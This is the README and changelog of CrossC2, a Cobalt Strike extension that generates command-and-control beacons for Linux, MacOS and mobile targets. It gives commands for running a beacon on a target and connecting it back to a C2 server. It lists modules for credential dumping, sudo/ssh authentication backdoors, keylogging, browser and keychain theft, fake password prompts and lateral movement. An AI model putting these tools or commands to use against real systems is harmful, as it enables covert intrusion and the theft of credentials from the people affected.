🚀 For a faster way, see cna introduction GO📌
🔥 Linux & MacOS supports no file landing, load and execute from memory dynamic library or executable file GO📖
🔥 Flexibly customize the data return type of the execution file, portscan, screenshot, keystrokes, credentials and other user-defined development to achieve more convenient implementation GO📖 ( Sample: GO📌 )
🔥 Custom communication protocol GO📖
🔥 Now supports lateral movement GO📌
🔥 Now supports loading scripts from memory GO📌
🎉 Android & iPhone support GO📌
▄████▄ ██▀███ ▒█████ ██████ ██████ ▄████▄ ██████▄
▒██▀ ▀█ ▓██ ▒ ██▒▒██▒ ██▒▒██ ▒ ▒██ ▒ ▒██▀ ▀█ ██░
▒▓█ ▄ ▓██ ░▄█ ▒▒██░ ██▒░ ▓██▄ ░ ▓██▄ ▒▓█ █████▒
▒▓▓▄ ▄██▒▒██▀▀█▄ ▒██ ██░ ▒ ██▒ ▒ ██▒ ▒▓▓▄ ▄█ ░▒██
▒ ▓███▀ ░░██▓ ▒██▒░ ████▓▒░▒██████▒▒▒██████▒▒ ▒ ▓███▀ ░▒▓█████▓
░ ░▒ ▒ ░░ ▒▓ ░▒▓░░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░ ░ ░▒ ▒ ░▒ ░▓ ░░
░ ▒ ░▒ ░ ▒░ ░ ▒ ▒░ ░ ░▒ ░ ░░ ░▒ ░ ░ ░ ▒ ░ ░░ ░
░ ░░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ CrossC2 v2.0 @hook
░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
A security framework for enterprises and Red Team personnel, supports CobaltStrike's penetration testing of other platforms (Linux / MacOS / ...), supports custom modules, and includes some commonly used penetration modules.
Only for internal use by enterprises and organizations, this framework has a certain degree of instability. Non-professionals are not allowed to use it. Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.
Windows | Linux | MacOS | iOS | Android | Embedded | |
---|---|---|---|---|---|---|
Run Env (x86) | √ | |||||
Run Env (x64) | √ | √ | √ | |||
gen beacon (x86) | √ | √ | ||||
gen beacon (x64) | √ | √ | ||||
gen beacon (armv7) | ⍻ | √ | ||||
gen beacon (arm64) | √ | √ | ||||
gen beacon (mips[el]) | ⍻ |
Restricted description:
- CobaltStrike: currently only supports the last version of cs 3.14(bug fixs) and 4.x versions are supported (see the cs4.1 branch for details).
- Linux: For particularly old systems, you can choose "Linux-GLIBC" option in cna (around 2010)
- MacOS: Latest systems only support 64-bit programs
- iOS: sandbox, restricted cmd
- Embedded: only *nix
- ⍻ : Loader is still in progress
Download:
- CrossC2.cna
- genCrossC2
(If it is a Windows system, download genCrossC2.Win.exe)
note⚠️
The two files that genCrossC2.Win.exe needs to depend on are `ucrtbased.dll` and `vcruntime140d.dll`.
You can install the dependencies yourself or use the files provided in the issue to copy to `C:\Windows\System32` [issue: win_sdk_dll](gloxec#49 (comment))
- Modify the
genCC2
path in theCrossC2.cna
script to the real path
77: $genCC2 = "/xxx/xx/xx/genCrossC2.MacOS"; # <-------- fix
- choose
Script Manager
, addCrossC2.cna
(If successfully installed, the menu bar will have an additional itemCrossC2
)
Create listener and copy key:
For some reasons, only HTTPS beacon is currently supported.
- Copy
.cobaltstrike.beacon_keys
from the cs directory on the server to the local directory.
CustomExtension:
- Add
CrossC2Kit_Loader.cna
after downloading CrossC2Kit. It contains other functions such as memory loading. (The file management function ofcs4.x
version is missing. Only use this Loader to re-enable file management)
Method of running beacon:
- Run the one-click online script generated by the CrossC2 plugin on the target
- After uploading the beacon to the target machine for empowered operation
- Set the working directory for beacon and run:
export CCPATH=/opt/ && /tmp/c2
- Temporarily specify the protocol library for beacon and run:
/tmp/c2 /tmp/c2-rebind.so
- Temporarily set C2 configuration for beacon:
export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
Reference documents: 📖 Wiki
Module: API introduction 📖 Wiki
It adopts the method of loading memory without landing, and supports dynamic libraries (.so/.dylib) and executable files (ELF/MachO).
The type of output information can be freely specified at the time of execution. The return type has been predetermined and can be docked with the native return data type of CS.
warning⚠️
``
CustomExtension
-
Password dump module: cc2_mimipenguin uses the open source project MimiPenguin2.0, see CrossC2Kit/ mimipenguin/mimipenguin.cna
-
Authentication backdoor modules: cc2_auth, cc2_ssh sudo / su / passwd and other authentication backdoors, ssh is connected and the credentials to connect to other hosts will be recorded.
-
Information collection modules: cc2_safari_dump, cc2_chrome_dump, cc2_iMessage_dump, cc2_keychain_dump access records of common browsers, as well as iMessage chat content and authentication credentials saved in the keychain will be obtained.
-
Traffic proxy module: cc2_frp supports fast TCP/KCP(UDP) reverse socks5 encrypted traffic proxy.
-
Keylogger module: cc2_keylogger records user's keyboard input.
-
Network detection module: cc2_portscan, cc2_serverscan for port scanning and service version scanning.
-
Privilege promotion module: cc2_prompt_spoof induces deception to obtain user account password.
-
Task management module: cc2_job manages the modules running in memory.
-
...
Custom communication protocol: API introduction 📖 Wiki
Can more easily realize C2Profile configuration and custom communication protocol TCP / UDP and so on.
- Generate beacon of
Linux-bind
/MacOS-bind
type - The target in the intranet runs
./MacOS-bind.beacon <port>
to start the service - Run
connect <targetIP>:<port>
in the session of China Unicom
Examples
The script interpreter such as bash / python / ruby / perl / php in the host can be called directly in the session to execute the script passed into the memory.
There is no information in the process, all running content is transferred from the memory to the interpreter
- python c:\getsysteminfo.py
- python import base64;print base64.b64encode('whoami'); print 'a'*40
- php
- Rich C2Profile support ✔︎ (Choose custom HTTP module when CNA generates beaocn)
- Staged Type Shellcode Generation ✔︎ (Only Linux is temporarily supported, and stagerServer needs to be started on the server)
- http-proxy (auth) & socks proxy back connection support
- Proxy-Pivots ✔︎ (Temporarily adopt the method of connecting back to socks proxy)
- node beacon? (Single node type, can host other beacon without relying on teamserver)
- Linux & MacOS side so/dylib's reverse shell support, and its derivative process injection functions
CustomExtension
Develop dynamic libraries and customize data return types, such as implementing some built-in functions.
- -fix The online issue of the high version of Linux introduced by the v2.2.4 version
- -fix A bug where memory execution may fail when passing in parameters
- -fix Fix the bug that caused the crash when the network connection is abnormal, for example, the teamserver suddenly exits abnormally when the package is being sent, etc. #106
- -fix The bug that the connect command does not specify a port when connecting to a child node will exit abnormally #95
- +support CDN server SNI support, now Cloudflare service can be used normally #87
- +support Linux 32&64 bits have supported procfs to obtain process information
- -change When beacon is online,
[config]: alive
will not be displayed by default, and it can be turned on withexport CC_DEBUG=1
#78
- -fix v2.2.3 beacon online issue #84 #85
- +support Support for obtaining process list information from procfs on Linux
- -fix Fix the bug that beacon exits when opening the file manager on 32-bit Linux.
- -fix Fix the parsing errors of
bcd
,bls
,bupload
and other functions in multi-instruction merge tasks, now you can process the same cna scripts as windows beacon. #81 - +support Add two environment variables to temporarily set the C2 server address for beacon connection. (
CCHOST
&CCPORT
)
export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
- +support Add support for
bupload
function. gloxec#81 (comment)
- -fix Fix some bugs that caused the beacon to fail to start when loading the custom communication protocol library.
- +support Add two mandatory beacon running methods for loading custom communication protocol library
- export CCPATH=/opt/ && /tmp/c2 (Mandatory setting of a working directory with permissions for beacon, such as
/opt/
)- /tmp/c2 /tmp/c2-rebind.so (Mandatory loading of communication protocol library for beacon)
Historical version update instructions
- -fix Fix the problem that the file download speed is too slow (now up to full speed)
- -fix Fix the problem of multiple files at the same time (use the
downloads
command to view the progress) - -fix Fix the problem that the
/tmp/
directory file permissions on the low-version kernel system do not have the execute permission by default, which causes thebeacon
to fail to start - -fix Fix the problem that resources are occupied and cause failure when
beacon
is repeatedly online on a low-version kernel system - -fix Fix the problem that files landing on low-version kernel systems face name conflicts and fail to run
- -change Only CS 4.x (>=4.1) version is supported, lower versions will no longer be supported.
- -fix Fix the protocol rebinding error of the low version of Linux kernel
- +support C2 domain name resolution
- +support Support continuous invocation of memory execution components
- +support Support for adding shell aliases for memory execution, so that other people in the team can directly call the loaded memory execution components through shell commands
- +support python-import support, like powershell-import to provide convenience for python execution
- +support low version GLIBC support of genCrossC2
- +support Support for parsing and executing scripts from memory
- +support Support CobaltStrike 4.1 (see cs4.1 branch for details)
- -fix Fix the problem of path errors caused by backslashes when uploading files in the file management office
- -fix Long-term testing in various scenarios in the real environment, fixing some hidden problems, and now more stable
- +support Support for lower kernel version systems
- +support Environment variables are automatically set at startup
- +support Delete sensitive env records at startup
- +support The background service process can be linked to the init process at startup
- +support Increase session spawn function
- +support Increase the function of session setting environment variables
- +support Increase the privilege escalation function of session getsystem
- +support Increase session analysis function to handle multiple merge tasks
- +support Increase Mac & Linux lateral movement function
- -fix genCrossC2's bug about protocol rebinding.
- -fix Linux daemon process and joblist display problem.
- +support Support custom communication protocol (HTTP, TCP, UDP...) .
- +support A new joblist module has been added to manage programs running without files in persistent memory.
- +support Reverse proxy module{TCP/KCP(UDP)} that executes without files in memory.
md5(genCrossC2.Linux) = 221b3ede4e78fee80f59946f116d7245
md5(genCrossC2.MacOS) = d216cad3fe3c25ead46b85c7ad7051f1
md5(genCrossC2.Win.exe) = a573506e8825b46b041ac3b9307a656b
- +support Support manual selection of key files.
- +support Support to generate shellcode.
- -change No longer rely on cobaltstrike.jar (plug-ins can be placed in any directory).
- -change More flexible and convenient Script Unix Web Delivery.
md5(genCrossC2.Linux) = 2ef7250cc3787d3cbd1e6f99c3c434aa
md5(genCrossC2.MacOS) = eaabde94dd7fed8dabb37cd67a1171c4
md5(genCrossC2.Win.exe) = c65ac808ed3a1000b3ff4ebb8c48ea4e
- -fix Multi-language garbled problem fix for memory load execution function
md5(genCrossC2.Linux) = 2347ed6e30e4655b793a6dbb4d33d25c
md5(genCrossC2.MacOS) = f530333500a76fe228864f8901af4104
md5(genCrossC2.Win.exe) = c223e31b2674a8a11d3254f92259e87a
- -fix Test multiple times for a long time in multiple scenarios in real environment, fix some hidden problems, now more stable
- +support Linux & MacOS Supports no file landing, loading and executing from memory
- +support Reserved CS built-in data types, richer user-defined plug-in return data types, free and easy to implement 'portscan' and other native functions
md5(genCrossC2.Linux) = 12295998d4bffd5b4c4a411fb33428bb
md5(genCrossC2.MacOS) = c88ce9df47529b243e2215a866d445c5
md5(genCrossC2.Win.exe) = 51d1814f1ebbab634bce0373ceb7cee6
- -change Multi-threaded background when shell commands are executed
- -change Redirect error output to standard output when shell command is executed.
- +support Add background file download function.
md5(genCrossC2.Linux) = b2e34f721ec2543b6625e33c8c2935df
md5(genCrossC2.MacOS) = 4e38a9d9a3eeff309648afc02e2e7664
- +support Compatibility with older versions of GLIBC on older systems Linux (around 2010).
- -fix genCrossC2.Linux crash.
- -fix uploading large file error.
- +support GUI file manager.
md5(genCrossC2.Linux) = 8256374d88c2149efc102aff7e90b3f9
md5(genCrossC2.MacOS) = 08fce0a5d964a091d8bf2344d7ab809e
- Support Linux & MacOS beacon generation.
md5(genCrossC2.Linux) = f4c0cc85c7cdd096d2b7febedc037538
md5(genCrossC2.MacOS) = 79fff0505092fc2055824ed1289ce8f9